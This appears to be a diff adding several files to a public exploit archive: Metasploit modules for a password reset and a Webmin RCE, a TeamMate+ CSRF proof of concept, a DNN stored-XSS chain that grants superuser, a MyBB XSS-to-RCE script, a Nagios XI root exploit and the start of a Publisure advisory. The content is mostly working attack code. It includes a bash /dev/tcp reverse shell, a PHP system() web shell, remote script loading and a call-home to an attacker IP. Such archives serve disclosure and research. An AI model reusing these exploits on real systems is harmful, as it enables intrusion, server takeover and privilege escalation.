'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
})
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? '"rand"'
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def run
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
if res.code == 200 and res.body.include? '"mobileMask"'
print_good("Excellent! password resettable for #{datastore["USERNAME"]}")
else
fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
end
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
@cookie = res.get_cookies
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getresult.jsp'),
'cookie' => @cookie,
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}"
})
if res.body.include? 'result":10'
print_good("boom! Password successfully reseted.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
else
fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}")
end
end
end
end

170
exploits/linux/webapps/47330.rb Executable file
View file

@ -0,0 +1,170 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Webmin < 1.930 Remote Code Execution",
'Description' => %q{
This exploit takes advantage of a code execution issue within the function
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
The only prerequisite is a valid session id.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay', # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'https://www.gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2019/08/30',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WMPORT', [ true, "Webmin port", '10000']),
OptString.new('WMUSER', [ true, "Webmin username", 'test']),
OptString.new('WMPASS', [ true, "Webmin password", 'test']),
])
end
def check
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return Exploit::CheckCode::Safe
end
else
# No dice
print_bad("Unexpected response")
return Exploit::CheckCode::Safe
end
# Verbose
print_status("Checking if host is vulnerable")
# Try to execute arbitrary code
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
# If it works our custom Content-Type will be set
if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
# Good
return Exploit::CheckCode::Vulnerable
else
# Bad
return Exploit::CheckCode::Safe
end
end
def exploit
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return
end
else
# No dice
print_bad("Unexpected response")
return
end
# Verbose
print_status("Sending selected payload")
# Hex encode payload to prevent problems with the payload getting mangled
hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')
# Send selected payload
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;`' + hex + '`',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
end
end

233
exploits/multiple/webapps/47342.html Normal file
View file

@ -0,0 +1,233 @@
Hello,
Please find the below vulnerability details,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ Cross-Site Request Forgery
(CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253
This is an article with PoC exploit code for for Wolters Kluwer TeamMate+
Cross-Site Request Forgery (CSRF) vulnerability
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files on TeamMate server or replace
existing uploaded files with malicious/forged files by enticing
authenticated user to visit attacker page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files on TeamMate server or replace existing uploaded
files with malicious/forged files) without victim's knowledge by enticing
authenticated user to visit attacker page/URL.
The specific flaw exists within the handling of request to
“DomainObjectDocumentUpload.ashx” application. An application failed to
validate CSRF token before handling the POST request.
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx",
true);
xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
"\r\n" +
"0\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"parentId\"\r\n" +
"\r\n" +
"1373\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
"\r\n" +
"34\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
"\r\n" +
"1106\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
"\r\n" +
"50\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data;
name=\"DocumentParentObjectType\"\r\n" +
"\r\n" +
"90\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"files[]\";
filename=\"Report.txt\"\r\n" +
"Content-Type: application/x-msdownload\r\n" +
"\r\n" +
"MZP\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel

204
exploits/multiple/webapps/47449.txt Normal file
View file

@ -0,0 +1,204 @@
/*
Exploit Title: "Display Name" Stored Unauthenticated XSS in DNN v9.3.2
Date: 4th of July, 2019
Exploit Author: Semen Alexandrovich Lyhin
Vendor Homepage: https://www.dnnsoftware.com/
Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases
Version: v9.3.2
CVE : CVE-2019-13293
A malicious unauthenticated person can attempt to register a user with the XSS payload in "Display Name" parameter.
The administrator of the website will see a notification that a new user needs to be approved.
An administrator should click on this notification, and the JavaScript code will be executed in the administrator's browser.
This exploit adds the user, and grants him administrator priviliges.
A native module "module creator" also allows remote code execution.
*/
function ApproveNotification(baseurl, id) {
return new Promise(function (resolve, reject) {
var url = baseurl + "/Activity-Feed/Messages/";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var post_params = "NotificationId=" + id;
var x1 = new XMLHttpRequest();
x1.open("POST", baseurl + "/API/InternalServices/NewUserNotificationService/Authorize");
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
x1.setRequestHeader('RequestVerificationToken', token);
x1.send(post_params);
resolve();
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function MakeSuperAdmin(baseurl, id) {
return new Promise(function (resolve, reject) {
var url = baseurl + "/Activity-Feed/Messages/";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var post_params = "null"
var x1 = new XMLHttpRequest();
x1.open("POST", baseurl + "/API/PersonaBar/Users/UpdateSuperUserStatus?userId=" + id + "&setSuperUser=true");
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
x1.setRequestHeader('RequestVerificationToken', token);
x1.send(post_params);
resolve();
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function GetNotification(baseurl, username, moduleid, tabid) {
return new Promise(function (resolve, reject) {
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var x1 = new XMLHttpRequest();
x1.open("GET", baseurl + "/API/CoreMessaging/MessagingService/Notifications?afterNotificationId=-1&numberOfRecords=1000&_=1562677665517", true);
x1.setRequestHeader('ModuleId', moduleid);
x1.setRequestHeader('TabId', tabid);
x1.onreadystatechange = () => {
if (x1.readyState == 4) {
if (!x1.responseType === "text") {
data = x1.responseText;
} else if (x1.responseType === "document") {
data = x1.responseXML;
} else {
data = x1.response;
}
//console.log(JSON.parse(data));
data = JSON.parse(data);
for (var key in data['Notifications']){
if (data['Notifications'][key]['Body'].includes(username)) {
resolve((data['Notifications'][key]['NotificationId']));
};
}
reject();
}
}
x1.send(null);
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function GetUserId(baseurl, username, tabid) {
return new Promise(function (resolve, reject) {
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var x1 = new XMLHttpRequest();
x1.open("GET", baseurl + "/API/PersonaBar/Users/GetUsers?searchText=" + username + "&filter=0&pageIndex=0&pageSize=10&sortColumn=&sortAscending=false", true);
x1.setRequestHeader('TabId', tabid);
x1.onreadystatechange = () => {
if (x1.readyState == 4) {
if (!x1.responseType === "text") {
data = x1.responseText;
} else if (x1.responseType === "document") {
data = x1.responseXML;
} else {
data = x1.response;
}
//console.log(data);
data = JSON.parse(data);
resolve((data['Results'][0]['userId']));
reject();
}
}
x1.send(null);
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
async function main(){
var username = "nobody34567";
var baseurl = "http://192.168.18.10/dotnetnuke/";
var moduleid = "374";
var tabid = "27"; //It's default ID of the module and tab, that should be used to get notification id. We can also parse it from the webpage.
var NotificationId = await GetNotification(baseurl, username, moduleid, tabid);
await ApproveNotification(baseurl, NotificationId);
var UserID = await GetUserId(baseurl, username, tabid);
MakeSuperAdmin(baseurl, UserID);
}
main();

109
exploits/php/webapps/47161.php Normal file
View file

@ -0,0 +1,109 @@
/*
# Exploit Title: MyBB < 1.8.21 Authenticated RCE
# Date: July 24, 2019
# Exploit Author: Giovanni Chhatta (https://www.linkedin.com/in/giovannichhatta/)
# Vendor Homepage: https://mybb.com/
# Software Link: https://resources.mybb.com/downloads/mybb_1820.zip
# Version: 1.8.20
# Tested on: Windows 10
# Blog: https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/
Example payload: [video=youtube]http://test/test#[url]onload='script=document.createElement(%22script%22);script.src=%22https://giovan.nl/mybb.js%22;document.body.append(script);'//[/url][/video]
This payload fetches another JS file (mybb.js), hosted on a VPS.
NOTE: Mybb's textbox will dynamically change apostrophes (') to &#39; . To fix this just manually change them back to apostrophes and hit 'send'.
The payload will trigger once an admin views the message.
*/
/*
* mybb.js
*/
function postReq(toUrl,body,setHeaders = true){
var xhr = new XMLHttpRequest();
xhr.open("POST",toUrl,false);
if(setHeaders){
xhr.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0");
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language","nl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------21840354016818");
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
}else{
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
}
xhr.send(body);
}
function getReq(toUrl, property = true){
var xhr = new XMLHttpRequest();
xhr.open("GET",toUrl,false);
xhr.send();
prop = property ? xhr.responseText : xhr.status;
return prop;
}
function upload(url,key,payload){
url = url + "admin/index.php?module=style-themes&action=import";
data = "-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"my_post_key\"\r\n\r\n"+key+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import\"\r\n\r\n0\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"local_file\"; filename=\"shel1l.xml\"\r\nContent-Type: text/xml\r\n\r\n"+payload+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"tid\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"version_compat\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_stylesheets\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_templates\"\r\n\r\n1\r\n-----------------------------21840354016818--\r\n";
postReq(url,data);
}
function fakeDiv(body){
var div = document.createElement('div');
div.innerHTML = body;
div.setAttribute("id","fakediv");
document.body.append(div);
var themeLink = document.getElementsByClassName("popup_item")[2].href;
var themeID = themeLink.substring(themeLink.indexOf("tid")+4,themeLink.length);
document.getElementById("fakediv").remove();
return themeID;
}
function getThemeID(url){
url = url + "admin/index.php?module=style-themes";
responseBody = getReq(url);
return fakeDiv(responseBody);
}
function editStylesheet(url,key,tid,filename){
url = url + "admin/index.php?module=style-themes&action=edit_stylesheet&mode=advanced";
data = "my_post_key="+key+"&tid="+tid+"&file="+filename+"&stylesheet=%3C%3Fphp+system%28%24_GET%5B1%5D%29%3B+%3F%3E&save=Save+Changes";
postReq(url,data,false);
}
function checkShell(url,theme,filename){
url = url + "cache/themes/theme" + theme + "/" + filename;
if(getReq(url,false) == 200){
console.log("[*] Shell found in theme " + theme);
window.open(host + "cache/themes/theme"+theme+"/"+filename+"?1=whoami");
}else{
console.log("[!] Exploit failed: Couldn't find shell.")
}
}
function callHome(theme){
let IP = "10.11.6.96"; // Change this
let port = 1234; // Change this
let url = "http://" + IP + ":" + port + "/" + document.domain + "/isPwned/theme" + theme;
getReq(url);
}
isAdmin = false;
host = location.href.split('/')[0] + "//" + location.href.split('/')[2] + "/mybb/"; // Change last part
key = document.getElementsByName("my_post_key")[0].value;
filename = "910910910910910910910910xD.php";
payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<theme>\r\n<stylesheets>\r\n<stylesheet name=\""+filename+".css\">\r\ngecko\r\n</stylesheet>\r\n</stylesheets>\r\n</theme>"
upload(host,key,payload);
theme = getThemeID(host);
editStylesheet(host,key,theme,filename);
isAdmin ? checkShell(host,theme,filename) : callHome(theme);

219
exploits/php/webapps/47299.php Normal file
View file

@ -0,0 +1,219 @@
<?php
/*
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.
The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download),
is executed as root via a passwordless sudo entry; the script executes the check_plugin executuable which is owned by the nagios user
A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server,can modify the check_plugin executable
and insert malicious commands exectuable as root.
Author: Jak Gibb (https://github.com/jakgibb/nagiosxi-root-exploit)
Date discovered: 28th July 2019
Reported to Nagios: 29th July 2019
Confirmed by Nagios: 29th July 2019
*/
$userVal = parseArgs($argv);
checkCookie();
$userVal['loginNSP'] = extractNSP($userVal['loginUrl']);
authenticate($userVal);
$userVal['pluginNSP'] = extractNSP($userVal['pluginUrl']);
uploadPayload($userVal);
triggerPayload($userVal);
function extractNSP($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);;
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
echo "[+] Grabbing NSP from: {$url}\n";
$response = curl_exec($curl);
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($httpCode == '200') {
echo "[+] Retrieved page contents from: {$url}\n";
} else {
echo "[+] Unable to open page: {$url} to obtain NSP\n";
exit(1);
}
$DOM = new DOMDocument();
@$DOM->loadHTML($response);
$xpath = new DOMXpath($DOM);
$input = $xpath->query('//input[@name="nsp"]');
$nsp = $input->item(0)->getAttribute('value');
if (isset($nsp)) {
echo "[+] Extracted NSP - value: {$nsp}\n";
} else {
echo "[+] Unable to obtain NSP from {$url}\n";
exit(1);
}
return $nsp;
}
function authenticate($userVal) {
$postValues = array(
'username' => $userVal['user'], 'password' => $userVal['pass'],
'pageopt' => 'login', 'nsp' => $userVal['loginNSP']
);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']);
curl_setopt($curl, CURLOPT_POST, TRUE);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues));
curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
echo "[+] Attempting to login...\n";
curl_exec($curl);
if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') {
echo "[+] Authentication success\n";
} else {
echo "[+] Unable to plguin, check your credentials\n";
exit(1);
}
echo "[+] Checking we have admin rights...\n";
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
$response = curl_exec($curl);
$title = NULL;
$dom = new DOMDocument();
if (@$dom->loadHTML($response)) {
$dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE;
}
if (strpos($title, 'Manage') !== FALSE) {
echo "[+] Admin access confirmed\n";
} else {
echo "[+] Unable to reach login page, are you admin?\n";
exit(1);
}
}
function uploadPayload($userVal) {
$payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
$headers = array();
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$headers[] = 'Accept-Language: en-GB,en;q=0.5';
$headers[] = 'Referer: ' . $userVal['pluginUrl'];
$headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Upgrade-Insecure-Requests: 1';
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
echo "[+] Uploading payload...\n";
$response = curl_exec($curl);
$dom = new DOMDocument();
@$dom->loadHTML($response);
$upload = FALSE;
foreach ($dom->getElementsByTagName('div') as $div) {
if ($div->getAttribute('class') === 'message') {
if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) {
$upload = TRUE;
}
}
}
if ($upload) {
echo "[+] Payload uploaded\n";
} else {
echo '[+] Unable to upload payload';
exit(1);
}
}
function triggerPayload($userVal) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
$headers = array();
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Upgrade-Insecure-Requests: 1';
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n";
curl_exec($curl);
}
function showHelp() {
echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n";
exit(0);
}
function parseArgs($argv) {
$userVal = array();
for ($i = 1; $i < count($argv); $i++) {
if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) {
$userVal[$match[1]] = $match[2];
}
}
if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) {
showHelp();
}
$userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://';
$userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php';
$userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php';
$userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download';
return $userVal;
}
function checkCookie() {
if (file_exists('cookie.txt')) {
echo "cookie.txt already exists - delete prior to running";
exit(1);
}
}

97
exploits/php/webapps/47359.txt Normal file
View file

@ -0,0 +1,97 @@
#####################################################################################
# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain]
# Google Dork: [N/A]
# Date: [05/09/2019]
# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company]
# Vendor Homepage: [https://www.publisure.com/]
# Software Link: [N/C]
# Version: [version 2.1.2]
# Tested on: [Windows 7 Enterprise]
# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254]
#####################################################################################
# Improper Access Control
#
# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
# OVE ID: OVE-20190724-0002
# CVE ID: CVE-2019-14253
#
#####################################################################################
# (Pre-Authenticated) Multiples SQL injection
#
# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
# OVE ID: OVE-20190724-0003
# CVE ID: CVE-2019-14254
#
#####################################################################################
# Unrestricted File Upload RCE
#
# CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
# OVE ID: OVE-20190724-0004
# CVE ID: CVE-2019-14252
#
#####################################################################################
# Fixes:
# Upgrade to latest product version and/or contact support for patches
#####################################################################################
I. PRODUCT
Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization.
The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution.
Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released.
II. ADVISORY
A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application.
III. VULNERABILITIES DESCRIPTIONS
a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted.
b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions.
Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example).
c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form.
This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file).
IV. PROOF OF CONCEPT
a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2)
b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli
"editUser.php" vulnerable code: $user = getUserDtails($_GET['id']);
"userAccFunctions.php" vulnerable code example:
function getUserDtails($id) {
global $db;
